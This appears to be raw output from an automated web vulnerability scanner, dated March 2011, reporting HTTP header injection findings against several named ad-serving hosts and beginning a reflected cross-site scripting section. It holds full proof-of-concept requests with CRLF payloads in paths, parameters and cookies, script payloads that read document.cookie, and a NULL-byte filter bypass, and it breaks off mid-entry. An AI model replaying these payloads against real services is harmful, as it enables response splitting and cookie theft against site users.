GET /6c73c%0d%0a2b896a07724/bicycling/home;rasegs=seg2;kw=;slot=123x204.1;topic=home;sbtpc=home;tile=2;sz=123x204;ord=972634134814143.1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6c73c 2b896a07724/bicycling/home;rasegs=seg2;kw=;slot=123x204.1;topic=home;sbtpc=home;tile=2;sz=123x204;ord=972634134814143.1: Date: Thu, 10 Mar 2011 16:40:03 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 7fb28%0d%0a5d755171d05 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7fb28%0d%0a5d755171d05/menshealth/home;rasegs=seg2;kw=;slot=728x90;topic=home;sbtpc=home;tile=1;sz=728x90;dcopt=ist;ord=3548400804866105.5 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7fb28 5d755171d05/menshealth/home;rasegs=seg2;kw=;slot=728x90;topic=home;sbtpc=home;tile=1;sz=728x90;dcopt=ist;ord=3548400804866105.5: Date: Thu, 10 Mar 2011 16:40:56 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2c10d%0d%0ab8b8b321907 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2c10d%0d%0ab8b8b321907/organicgardening/home;rasegs=seg2;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=2537748990580439.5 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.organicgardening.com/?cm_sp=Network%20Banner-_-OG-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2c10d b8b8b321907/organicgardening/home;rasegs=seg2;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=2537748990580439.5: Date: Thu, 10 Mar 2011 16:45:07 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 3a618%0d%0abf6e70eb76b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3a618%0d%0abf6e70eb76b/prevention/home;topic=home;sbtpc=home;cat=;kw=;tile=2;slot=203x88.1;sz=203x88;ord=4994262496475130? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3a618 bf6e70eb76b/prevention/home;topic=home;sbtpc=home;cat=;kw=;tile=2;slot=203x88.1;sz=203x88;ord=4994262496475130: Date: Thu, 10 Mar 2011 16:40:05 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 11bac%0d%0acea0052660f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /11bac%0d%0acea0052660f/prevention/lifelongbeauty;rasegs=seg2;topic=eb53a'style='xexpression(alert(1))'f8b875ad203;sbtpc=bobbibrown;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=6897114093881100? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/11bac cea0052660f/prevention/lifelongbeauty;rasegs=seg2;topic=eb53a'style='xexpression(alert(1))'f8b875ad203;sbtpc=bobbibrown;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=6897114093881100: Date: Thu, 10 Mar 2011 22:23:23 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 62f9f%0d%0a36bce5cafc7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62f9f%0d%0a36bce5cafc7/rodale/fitness;topic=8astonishingbenefitsofwalking;sbtpc=;cat=fitness;slot=160x600.1;tile=1;sz=160x600;kw=;ord=142681257566437120? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.rodale.com/benefits-walking?4bec2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eec68e81f22b=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/62f9f 36bce5cafc7/rodale/fitness;topic=8astonishingbenefitsofwalking;sbtpc=;cat=fitness;slot=160x600.1;tile=1;sz=160x600;kw=;ord=142681257566437120: Date: Thu, 10 Mar 2011 22:18:52 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 89a70%0d%0a4a192a08534 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /89a70%0d%0a4a192a08534/runnersworld/community;rasegs=seg2;kw=;slot=728x90.1;topic=profile;sbtpc=blogviewpost;tile=1;dcopt=ist;sz=728x90;ord=226473612710833540? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/89a70 4a192a08534/runnersworld/community;rasegs=seg2;kw=;slot=728x90.1;topic=profile;sbtpc=blogviewpost;tile=1;dcopt=ist;sz=728x90;ord=226473612710833540: Date: Thu, 10 Mar 2011 22:19:51 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 113c7%0d%0a6798c3251f0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /113c7%0d%0a6798c3251f0/runnersworld/home;rasegs=seg2;kw=;slot=150x186.1;topic=home;sbtpc=home;tile=2;sz=150x186;ord=479584154672920700? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/113c7 6798c3251f0/runnersworld/home;rasegs=seg2;kw=;slot=150x186.1;topic=home;sbtpc=home;tile=2;sz=150x186;ord=479584154672920700: Date: Thu, 10 Mar 2011 16:40:03 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 3b862%0d%0a8ca34c13755 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /dot.gif3b862%0d%0a8ca34c13755?8285523 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/dot.gif3b862 8ca34c13755: Date: Thu, 10 Mar 2011 16:42:30 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5fcd0%0d%0af26994b0bbc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5fcd0%0d%0af26994b0bbc;v7;j;222850430;5-0;1;12147288;0/0;41092130/41109917/1;;~aopt=3/0/83/0;~okv=;rasegs=seg2;topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;~cs=g%3fhttp://s0.2mdn.net/2521530/2017187_menopause_1.jpg HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5fcd0 f26994b0bbc;v7;j;222850430;5-0;1;12147288;0/0;41092130/41109917/1;;~aopt=3/0/83/0;~okv=;rasegs=seg2;topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;~cs=g: Date: Thu, 10 Mar 2011 16:40:33 GMT Server: GFE/2.0
The value of the ES cookie is copied into the Set-Cookie response header. The payload b94cd%0d%0a0acdc94cdfa was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adsc/d876089/3/885674/adscout.php?ord=8309460 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5Bb94cd%0d%0a0acdc94cdfa
The value of the ES cookie is copied into the Set-Cookie response header. The payload da28e%0d%0af59a7dd42e was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adsc/d876089/3/885678/adscout.php?ord=8309460 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=da28e%0d%0af59a7dd42e
The value of the ES cookie is copied into the Set-Cookie response header. The payload 9b893%0d%0a01a1d42b0c5 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adsc/d876089/3/885679/adscout.php?ord=8309460 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=9b893%0d%0a01a1d42b0c5
The value of the ES cookie is copied into the Set-Cookie response header. The payload be7bc%0d%0a63bff395090 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adsc/d876089/8/40909683/decide.php?&noiframe=1 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=be7bc%0d%0a63bff395090
The value of the code request parameter is copied into the Location response header. The payload a8ca6%0d%0aab57d3e3f43 was submitted in the code parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=876089&site=60649346&code=40909683a8ca6%0d%0aab57d3e3f43&randnum=6149086 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-g
The value of the site request parameter is copied into the Location response header. The payload b4fec%0d%0a280adc6526b was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=876089&site=b4fec%0d%0a280adc6526b&code=40909683&randnum=6149086 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-g
The value of the code request parameter is copied into the Location response header. The payload d3db1%0d%0abd31793905f was submitted in the code parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/sta.php?survey_num=876089&site=2285373&code=d3db1%0d%0abd31793905f&ut_sys=eb HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B
The value of the site request parameter is copied into the Location response header. The payload 308d0%0d%0a7110d05c4d2 was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/sta.php?survey_num=876089&site=308d0%0d%0a7110d05c4d2&code=4699231&ut_sys=eb HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B
The value of the flv request parameter is copied into the Set-Cookie response header. The payload c6825%0d%0a63ad61cc419 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=c6825%0d%0a63ad61cc419&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com Origin: http://www.womenshealthmag.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the res request parameter is copied into the Set-Cookie response header. The payload b49be%0d%0a4750443b61 was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=10.2154&wmpv=0&res=b49be%0d%0a4750443b61 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com Origin: http://www.womenshealthmag.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=FLV=10.2154&RES=b49be 4750443b61&WMPV=0; expires=Wed, 08-Jun-2011 12: 23:58 GMT; domain=bs.serving-sys.com; path=/ P3P: CP="NOI DEVa OUR BUS UNI" Date: Thu, 10 Mar 2011 17:23:57 GMT Connection: close Content-Length: 0
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 4d71c%0d%0a42293c12f4c was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=10.2154&wmpv=4d71c%0d%0a42293c12f4c&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com Origin: http://www.womenshealthmag.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=BWVal=1402&BWDate=40612.379687&debuglevel=&FLV=10.2154&RES=128&WMPV=4d71c 42293c12f4c; expires=Wed, 08-Jun-2011 12: 23:57 GMT; domain=bs.serving-sys.com; path=/ P3P: CP="NOI DEVa OUR BUS UNI" Date: Thu, 10 Mar 2011 17:23:57 GMT Connection: close Content-Length: 0
2. Cross-site scripting (reflected)previous There are 1086 instances of this issue:
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0055ee3'-alert(1)-'9f815ea7f25 was submitted in the adurl parameter. This input was echoed as 55ee3'-alert(1)-'9f815ea7f25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=%0055ee3'-alert(1)-'9f815ea7f25 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
